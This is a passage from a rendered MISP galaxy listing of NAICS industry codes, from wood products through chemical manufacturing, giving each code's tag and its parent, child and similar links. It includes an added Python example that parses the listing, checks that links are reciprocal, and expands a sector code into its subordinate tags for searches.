The tag is: misp-galaxy:naics="321212"

321212 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321215

Engineered Wood Member Manufacturing

The tag is: misp-galaxy:naics="321215"

321215 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321219

Reconstituted Wood Product Manufacturing

The tag is: misp-galaxy:naics="321219"

321219 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

3219

Other Wood Product Manufacturing

The tag is: misp-galaxy:naics="3219"

3219 has relationships with:

  • child-of: misp-galaxy:naics="321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321918" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321999" with estimative-language:likelihood-probability="likely"

32191

Millwork

The tag is: misp-galaxy:naics="32191"

32191 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321911

Wood Window and Door Manufacturing

The tag is: misp-galaxy:naics="321911"

321911 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321912

Cut Stock, Resawing Lumber, and Planing

The tag is: misp-galaxy:naics="321912"

321912 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321918

Other Millwork (including Flooring)

The tag is: misp-galaxy:naics="321918"

321918 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

32192

Wood Container and Pallet Manufacturing

The tag is: misp-galaxy:naics="32192"

32192 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="321920" with estimative-language:likelihood-probability="likely"

321920

Wood Container and Pallet Manufacturing

The tag is: misp-galaxy:naics="321920"

321920 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32192" with estimative-language:likelihood-probability="likely"

32199

All Other Wood Product Manufacturing

The tag is: misp-galaxy:naics="32199"

32199 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321991

Manufactured Home (Mobile Home) Manufacturing

The tag is: misp-galaxy:naics="321991"

321991 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321992

Prefabricated Wood Building Manufacturing

The tag is: misp-galaxy:naics="321992"

321992 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321999

All Other Miscellaneous Wood Product Manufacturing

The tag is: misp-galaxy:naics="321999"

321999 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

322

Paper Manufacturing

The tag is: misp-galaxy:naics="322"

322 has relationships with:

  • parent-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

3221

Pulp, Paper, and Paperboard Mills

The tag is: misp-galaxy:naics="3221"

3221 has relationships with:

  • child-of: misp-galaxy:naics="322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322130" with estimative-language:likelihood-probability="likely"

32211

Pulp Mills

The tag is: misp-galaxy:naics="32211"

32211 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322110" with estimative-language:likelihood-probability="likely"

322110

Pulp Mills

The tag is: misp-galaxy:naics="322110"

322110 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32211" with estimative-language:likelihood-probability="likely"

32212

Paper Mills

The tag is: misp-galaxy:naics="32212"

32212 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322120" with estimative-language:likelihood-probability="likely"

322120

Paper Mills

The tag is: misp-galaxy:naics="322120"

322120 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32212" with estimative-language:likelihood-probability="likely"

32213

Paperboard Mills

The tag is: misp-galaxy:naics="32213"

32213 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322130" with estimative-language:likelihood-probability="likely"

322130

Paperboard Mills

The tag is: misp-galaxy:naics="322130"

322130 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32213" with estimative-language:likelihood-probability="likely"

3222

Converted Paper Product Manufacturing

The tag is: misp-galaxy:naics="3222"

3222 has relationships with:

  • child-of: misp-galaxy:naics="322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322299" with estimative-language:likelihood-probability="likely"

32221

Paperboard Container Manufacturing

The tag is: misp-galaxy:naics="32221"

32221 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322211

Corrugated and Solid Fiber Box Manufacturing

The tag is: misp-galaxy:naics="322211"

322211 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322212

Folding Paperboard Box Manufacturing

The tag is: misp-galaxy:naics="322212"

322212 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322219

Other Paperboard Container Manufacturing

The tag is: misp-galaxy:naics="322219"

322219 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

32222

Paper Bag and Coated and Treated Paper Manufacturing

The tag is: misp-galaxy:naics="32222"

32222 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322220" with estimative-language:likelihood-probability="likely"

322220

Paper Bag and Coated and Treated Paper Manufacturing

The tag is: misp-galaxy:naics="322220"

322220 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32222" with estimative-language:likelihood-probability="likely"

32223

Stationery Product Manufacturing

The tag is: misp-galaxy:naics="32223"

32223 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322230" with estimative-language:likelihood-probability="likely"

322230

Stationery Product Manufacturing

The tag is: misp-galaxy:naics="322230"

322230 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32223" with estimative-language:likelihood-probability="likely"

32229

Other Converted Paper Product Manufacturing

The tag is: misp-galaxy:naics="32229"

32229 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322291

Sanitary Paper Product Manufacturing

The tag is: misp-galaxy:naics="322291"

322291 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322299

All Other Converted Paper Product Manufacturing

The tag is: misp-galaxy:naics="322299"

322299 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

323

Printing and Related Support Activities

The tag is: misp-galaxy:naics="323"

323 has relationships with:

  • parent-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

3231

Printing and Related Support Activities

The tag is: misp-galaxy:naics="3231"

3231 has relationships with:

  • child-of: misp-galaxy:naics="323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323120" with estimative-language:likelihood-probability="likely"

32311

Printing

The tag is: misp-galaxy:naics="32311"

32311 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

323111

Commercial Printing (except Screen and Books)

The tag is: misp-galaxy:naics="323111"

323111 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

323113

Commercial Screen Printing

The tag is: misp-galaxy:naics="323113"

323113 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

323117

Books Printing

The tag is: misp-galaxy:naics="323117"

323117 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

32312

Support Activities for Printing

The tag is: misp-galaxy:naics="32312"

32312 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="323120" with estimative-language:likelihood-probability="likely"

323120

Support Activities for Printing

The tag is: misp-galaxy:naics="323120"

323120 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32312" with estimative-language:likelihood-probability="likely"

324

Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="324"

324 has relationships with:

  • parent-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

3241

Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="3241"

3241 has relationships with:

  • child-of: misp-galaxy:naics="324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32419" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324199" with estimative-language:likelihood-probability="likely"

32411

Petroleum Refineries

The tag is: misp-galaxy:naics="32411"

32411 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="324110" with estimative-language:likelihood-probability="likely"

324110

Petroleum Refineries

The tag is: misp-galaxy:naics="324110"

324110 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32411" with estimative-language:likelihood-probability="likely"

32412

Asphalt Paving, Roofing, and Saturated Materials Manufacturing

The tag is: misp-galaxy:naics="32412"

32412 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324121

Asphalt Paving Mixture and Block Manufacturing

The tag is: misp-galaxy:naics="324121"

324121 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324122

Asphalt Shingle and Coating Materials Manufacturing

The tag is: misp-galaxy:naics="324122"

324122 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

32419

Other Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="32419"

32419 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324191

Petroleum Lubricating Oil and Grease Manufacturing

The tag is: misp-galaxy:naics="324191"

324191 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324199

All Other Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="324199"

324199 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"
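
The relationship blocks above (parent-of, child-of, similar) form a graph, and in practice an analyst wants two things from it: confidence that each link has its reciprocal in the partner cluster, and a way to expand a sector code such as 324 into every more specific NAICS tag beneath it when searching a MISP instance. The following Python is an added example, not code from the MISP project or the galaxy repository; it parses the rendered listing format shown on this page (the "The tag is:" and "X has relationships with:" lines). The embedded sample is the 324 subtree transcribed from the listing above with the blank spacer lines dropped; the function names and the rendered-text input format are this example's own assumptions.

```python
"""Parse the rendered MISP galaxy NAICS listing into a graph, check that every
relationship has its reciprocal, and expand a sector code into all tags below it."""
import re

# Constructed sample: the 324 subtree transcribed from the listing above, with the
# blank spacer lines dropped (the parser skips blank lines anyway).
SAMPLE = """\
324
Petroleum and Coal Products Manufacturing
The tag is: misp-galaxy:naics="324"
324 has relationships with:
  • parent-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"
3241
Petroleum and Coal Products Manufacturing
The tag is: misp-galaxy:naics="3241"
3241 has relationships with:
  • child-of: misp-galaxy:naics="324" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="32411" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="324110" with estimative-language:likelihood-probability="likely"
32411
Petroleum Refineries
The tag is: misp-galaxy:naics="32411"
32411 has relationships with:
  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="324110" with estimative-language:likelihood-probability="likely"
324110
Petroleum Refineries
The tag is: misp-galaxy:naics="324110"
324110 has relationships with:
  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="32411" with estimative-language:likelihood-probability="likely"
"""

TAG_RE = re.compile(r'^The tag is: (misp-galaxy:naics="(\d+)")$')
HDR_RE = re.compile(r'^(\d+) has relationships with:$')
REL_RE = re.compile(r'^•\s*(parent-of|child-of|similar): misp-galaxy:naics="(\d+)"')
# The relationship a partner cluster must carry for a link to be reciprocal.
INVERSE = {"parent-of": "child-of", "child-of": "parent-of", "similar": "similar"}


def parse_listing(text):
    """Return {code: {"tag": str, "name": str, "rels": [(kind, other_code), ...]}}."""
    clusters, current, pending_name = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := TAG_RE.match(line):
            tag, current = m.groups()
            clusters[current] = {"tag": tag, "name": pending_name, "rels": []}
        elif m := HDR_RE.match(line):
            current = m.group(1)
        elif (m := REL_RE.match(line)) and current in clusters:
            clusters[current]["rels"].append((m.group(1), m.group(2)))
        elif not line.isdigit():
            pending_name = line  # the cluster name sits between the code heading and its tag
    return clusters


def check_consistency(clusters):
    """List links whose target is missing or whose partner lacks the reciprocal link."""
    problems = []
    for code, info in clusters.items():
        for kind, other in info["rels"]:
            if other not in clusters:
                problems.append(f"{code} {kind} {other}: target not in listing")
            elif (INVERSE[kind], code) not in clusters[other]["rels"]:
                problems.append(f"{code} {kind} {other}: no reciprocal {INVERSE[kind]}")
    return problems


def subtree_tags(clusters, code):
    """Tags of `code` and everything reachable from it over parent-of edges,
    ordered from the sector code down to the six-digit national industries."""
    seen, stack = set(), [code]
    while stack:
        c = stack.pop()
        if c in seen:
            continue
        seen.add(c)
        stack.extend(other for kind, other in clusters[c]["rels"] if kind == "parent-of")
    return [clusters[c]["tag"] for c in sorted(seen, key=lambda x: (len(x), x))]


if __name__ == "__main__":
    graph = parse_listing(SAMPLE)
    print("problems:", check_consistency(graph) or "none")
    for tag in subtree_tags(graph, "324"):
        print(tag)
```

Run against the full listing, check_consistency() is the quick sanity check before loading a locally modified copy of the galaxy into a MISP instance, and the list returned by subtree_tags() is what you would hand to a tag filter (for example the tags argument of a PyMISP search) so that a query for the petroleum sector also matches events tagged only with a refinery-level code.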

325

Chemical Manufacturing

The tag is: misp-galaxy:naics="325"

325 has relationships with:

  • parent-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

3251

Basic Chemical Manufacturing

The tag is: misp-galaxy:naics="3251"

3251 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32518" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325180" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32519" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325199" with estimative-language:likelihood-probability="likely"

32511

Petrochemical Manufacturing

The tag is: misp-galaxy:naics="32511"

32511 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325110" with estimative-language:likelihood-probability="likely"

325110

Petrochemical Manufacturing

The tag is: misp-galaxy:naics="325110"

325110 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32511" with estimative-language:likelihood-probability="likely"

32512

Industrial Gas Manufacturing

The tag is: misp-galaxy:naics="32512"

32512 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325120" with estimative-language:likelihood-probability="likely"

325120

Industrial Gas Manufacturing

The tag is: misp-galaxy:naics="325120"

325120 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32512" with estimative-language:likelihood-probability="likely"

32513

Synthetic Dye and Pigment Manufacturing

The tag is: misp-galaxy:naics="32513"

32513 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325130" with estimative-language:likelihood-probability="likely"

325130

Synthetic Dye and Pigment Manufacturing

The tag is: misp-galaxy:naics="325130"

325130 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32513" with estimative-language:likelihood-probability="likely"

32518

Other Basic Inorganic Chemical Manufacturing

The tag is: misp-galaxy:naics="32518"

32518 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325180" with estimative-language:likelihood-probability="likely"

325180

Other Basic Inorganic Chemical Manufacturing

The tag is: misp-galaxy:naics="325180"

325180 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32518" with estimative-language:likelihood-probability="likely"

32519

Other Basic Organic Chemical Manufacturing

The tag is: misp-galaxy:naics="32519"

32519 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

325193

Ethyl Alcohol Manufacturing

The tag is: misp-galaxy:naics="325193"

325193 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

325194

Cyclic Crude, Intermediate, and Gum and Wood Chemical Manufacturing

The tag is: misp-galaxy:naics="325194"

325194 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

325199

All Other Basic Organic Chemical Manufacturing

The tag is: misp-galaxy:naics="325199"

325199 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

3252

Resin, Synthetic Rubber, and Artificial and Synthetic Fibers and Filaments Manufacturing

The tag is: misp-galaxy:naics="3252"

3252 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325220" with estimative-language:likelihood-probability="likely"

32521

Resin and Synthetic Rubber Manufacturing

The tag is: misp-galaxy:naics="32521"

32521 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

325211

Plastics Material and Resin Manufacturing

The tag is: misp-galaxy:naics="325211"

325211 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

325212

Synthetic Rubber Manufacturing

The tag is: misp-galaxy:naics="325212"

325212 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

32522

Artificial and Synthetic Fibers and Filaments Manufacturing

The tag is: misp-galaxy:naics="32522"

32522 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325220" with estimative-language:likelihood-probability="likely"

325220

Artificial and Synthetic Fibers and Filaments Manufacturing

The tag is: misp-galaxy:naics="325220"

325220 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32522" with estimative-language:likelihood-probability="likely"

3253

Pesticide, Fertilizer, and Other Agricultural Chemical Manufacturing

The tag is: misp-galaxy:naics="3253"

3253 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325320" with estimative-language:likelihood-probability="likely"

32531

Fertilizer and Compost Manufacturing

The tag is: misp-galaxy:naics="32531"

32531 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325311

Nitrogenous Fertilizer Manufacturing

The tag is: misp-galaxy:naics="325311"

325311 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325312

Phosphatic Fertilizer Manufacturing

The tag is: misp-galaxy:naics="325312"

325312 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325314

Fertilizer (Mixing Only) Manufacturing

The tag is: misp-galaxy:naics="325314"

325314 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325315

Compost Manufacturing

The tag is: misp-galaxy:naics="325315"

325315 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

32532

Pesticide and Other Agricultural Chemical Manufacturing

The tag is: misp-galaxy:naics="32532"

32532 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325320" with estimative-language:likelihood-probability="likely"

325320

Pesticide and Other Agricultural Chemical Manufacturing

The tag is: misp-galaxy:naics="325320"

325320 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32532" with estimative-language:likelihood-probability="likely"

3254

Pharmaceutical and Medicine Manufacturing

The tag is: misp-galaxy:naics="3254"

3254 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325414" with estimative-language:likelihood-probability="likely"

32541

Pharmaceutical and Medicine Manufacturing

The tag is: misp-galaxy:naics="32541"

32541 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325411

Medicinal and Botanical Manufacturing

The tag is: misp-galaxy:naics="325411"

325411 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325412

Pharmaceutical Preparation Manufacturing

The tag is: misp-galaxy:naics="325412"

325412 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325413

In-Vitro Diagnostic Substance Manufacturing

The tag is: misp-galaxy:naics="325413"

325413 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325414

Biological Product (except Diagnostic) Manufacturing

The tag is: misp-galaxy:naics="325414"

325414 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

3255

Paint, Coating, and Adhesive Manufacturing

The tag is: misp-galaxy:naics="3255"

3255 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32552" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325520" with estimative-language:likelihood-probability="likely"

32551

Paint and Coating Manufacturing

The tag is: misp-galaxy:naics="32551"

32551 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325510" with estimative-language:likelihood-probability="likely"

325510

Paint and Coating Manufacturing

The tag is: misp-galaxy:naics="325510"

325510 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32551" with estimative-language:likelihood-probability="likely"

32552

Adhesive Manufacturing

The tag is: misp-galaxy:naics="32552"

32552 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325520" with estimative-language:likelihood-probability="likely"

325520

Adhesive Manufacturing

The tag is: misp-galaxy:naics="325520"

325520 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32552" with estimative-language:likelihood-probability="likely"

3256

Soap, Cleaning Compound, and Toilet Preparation Manufacturing

The tag is: misp-galaxy:naics="3256"

3256 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325620" with estimative-language:likelihood-probability="likely"

32561

Soap and Cleaning Compound Manufacturing

The tag is: misp-galaxy:naics="32561"

32561 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

325611

Soap and Other Detergent Manufacturing

The tag is: misp-galaxy:naics="325611"

325611 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

325612

Polish and Other Sanitation Good Manufacturing

The tag is: misp-galaxy:naics="325612"

325612 has relationships with:

